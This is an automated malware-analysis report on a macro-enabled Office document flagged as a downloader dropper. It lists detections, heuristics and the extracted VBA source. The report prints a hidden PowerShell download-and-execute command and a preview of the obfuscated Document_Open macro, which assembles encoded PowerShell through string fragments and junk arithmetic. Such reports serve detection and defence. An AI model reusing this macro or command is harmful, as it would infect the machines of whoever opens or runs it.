Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a VBA macro that is automatically executed upon opening. This macro utilizes the Shell() function to run a PowerShell command. The reconstructed PowerShell command, 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"', indicates that it downloads and executes a second-stage payload from the specified URL. This behavior is consistent with a macro-based downloader.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6606826-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6606826-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19959 bytes |

SHA-256: 0276fa37d77bce179b0ff34cf1975afeed9b46b4ec0a43b98d722c2c657286a5

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "TdZiWUY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
nsikJN = HPioz - mnBIT * (uQiXv - CtpvdV / oOjFa * aiJoO + (dEJuf + NrzCYE * 39745 + AGThMm))
clmLTK = cbzHtP - wTQwMQ * (jFVTNU - LWfEY / cwolZ * IztPKm + (KLhzfF + ttfRr * 9978 + FRFUCV))
YzjLlisX ("" + uFhbzsnl + PRjszKBPdS + UkNSQ + UEzWojIwOi + UfKpwv + fiYjHwq + hkJLdWzw)
bDzVV = ulDYJ - AwDtEU * (Nhbaii - LszEru / wSzTv * djQpEf + (fdMrul + jXzdS * 74318 + LBlwh))
jQWuU = DinvHQ - wJCVG * (NwDqG - Vjtoi / DTwcl * jDzEO + (tDQQL + aBsdo * 30104 + ZPkzGJ))
End Sub
Attribute VB_Name = "CiEaJiOh"
Function UkNSQ()
On Error Resume Next
BjswK = 90909 - cOPOw + 61630 / HbqDp * oIHhrv * tEzHm - oDpDlH * oCAnQk
JwCfod = 57934 + YUQvU / KMXsN * Dvhni / (15563 / WwiRb - fOCijz - OzvZA)
aXrXTTbow = "p" + YEWLoft + FPmOYOIb + "o" + USXEvJKlITRGd + jukbHJKQsjrta + "we" + fojZMoAzaBit + twlLarT + "rsh" + thJCiYE + HXodXEOzjuJZ + "ell" + ZKziGhAmR + qsClVbWlvmOQQ + " .(" + wbLYOaQRkrip + jUFhojLMNKTm + " $E" + dLtjHYlYassO + StrmYCMSIjb + "nv:" + kOBFblinZw + YzKtNoaHltTT + "C" + lVLDKINDB + mRcrmtvvDz + "oMs" + YuuAnkq + ZNzMcVnnVVvA + "pe" + XzQwAXXdOjU + PHaSKPqN + "c[4" + iKXHIiiJAET + XlqWLvz + "," + pNYjvDkkdNSUl + QPukWTiorDD + "15," + tfRFJlUJjc + ZQaGEilzNGw + "2" + zZHZjcsWQ + wNKzTShmHJzDHi + "5]"
EoiiY = 92767 - jELNZV + 70123 / qOuIs * SwTNd * ZwZMt - iBLrU * zKuiw
RjGmj = 30770 - MMNkCz + 90783 / IYcJq * livZJ * FAVzqt - amKEP * XwnFif
Knmwro = 43901 - rlqKRu + 55926 / hfwTD * iBztbK * ajzcXT - nBhYXa * PUjDXU
jnOXjHlNZiS = "-jo" + AXlXElz + MNQBrhub + "i" + jzZwdwTjSqEq + hwFmwbBEj + "N'" + MaNczIvX + EaaIalEiIHW + "'" + UtbIfVi + NlQVFEThJ + ") (" + icYfdVqzabFot + jXAPBUFqNorFj + " " + azDbTsVw + flAmIwXw + "New" + vjuQXdlKqm + wOAHlRFA + "-o" + WEWjEDFrUIT + uDmEpGKFs + "BJe" + ommALFrLGU + unZiFzRHqRwFE + "CT" + PuDViJBv + EjPRIZvlN + " Io"
WwGhAY = 16941 - DnYzw + 58587 / MEGzcv * jaJVU * jszjzr - FNJFX * NwcfYa
QYEGa = 75999 - WojvMt + 53246 / Cwifs * HQBTCp * sCUrGv - VzPDWX * dkITW
YENYNv = 37586 - fYiEi + 53535 / nrzFI * wuAamh * Hvkua - HomHmv * silbT
ZfvMJBYvY = "." + pnaVlMZJMwaO + knkisUW + "C" + KJGmQJZGbvVS + ZoZhiaJM + "o" + mzzqpTSOoDQLi + znrzSrod + "M" + pTmrabwc + SMiRHdG + "Pr" + tNKzXfn + OwwUTfzAf + "E" + cRjNZrnEZ + kKZkwiTOMnJlN + "ssI" + zsCRHzk + bdwajrirVZN + "ON" + ihUjRJaSjWuXuu + jrzuzIUi + ".D" + VESPoFOBJVwb + pJvGBDlzhjm + "Ef" + twaMmnioV + hpIskjLHL + "L"
nNNjp = (YXjcHr * 40585 + 6644 + IKnzmT * 19171 + ZMusMA / (iVonK * wGzmQ * 96384 / 31547))
wnpBXA = (Omldj * 78261 + 38279 + DLWKwl * 4428 + tWJEqL / (VtpwO * DKdXK * 14753 / 4126))
WRiRVlqFkw = "a" + KmCiEbFqpwG + NwdCQQktqFo + "tEs" + tnndAiM + RncRtowJSAHfPa + "tRe" + llwkTjO + iSDLvbj + "AM(" + fpawWwvjn + VdMGZOtQHflZu + "[I" + VvzWZXsB + imPzonsapiEFw + "o." + iTfitQfkKazj + VcbQPubdQ + "mE" + swFjHPzLpqEMT + wCEZpDbMTFd + "m" + rFECMpBRaDD + XcXQQHO + "or" + ZYrdoQmlbdaTTj + zdAJXwB + "YST" + fzoDoVaqvffLj + ipcZkhEsmPQi + "r" + ZaXcpIRwimI + YDFqQdOihVb + "E" + bGCnYrLK + IiurUjH + "am]"
jEfoj = (zBzCr * 9575 + 92980 + hhKwuO * 33125 + SCwzHW / (uzZjJu * vRVOY * 80930 / 22894))
iEPJsEUrl = "[S" + LkMKJkNbAvmdqi + PFERYmDilsa + "y" + bcKXwlXKakNME + QRbmzwaGDNbZji + "Ste" + JimZTcGrz + pUqFUcENT + "M" + htAVGJXMrbBTE + kfoLkpEdl + ".Co" + IGwbVEAV + YzVwTlBrnBmbC + "n" + YIfwcQPkuB + QGzSidZMi + "veR" + RECmzjZhD + wvUXYcI + "t" + vBVlkpjEzdj + uOtadSA + "]" + NLNKBzLFwE + SPjQBHAVjZYLr + ":" + dzwqMGa + Yaoltshb + ":F" + bwKJbKzz + nCTzriHzOJlrb + "rO" + bTPcrswriZHSo + MHqzWVHotLk + "M" + KbjXlRArk + vrLoakPTaiziBc + "BAs" + UiVRGIijCp + WWobkwEiKSOJ + "E" + JfNzhuhuf + FnnJfmkAh + "64" + tWtFYYM + LVowCSFIp + "s" + rbLiIQUfjiJ + GmrEcWIidz + "Tr"
zoHMjc = (iTMRK * 27920 + 94554 + DjWlC * 15230 + rPbBf / (ruOiI * JbNTzB * 97190 / 60853))
... (truncated)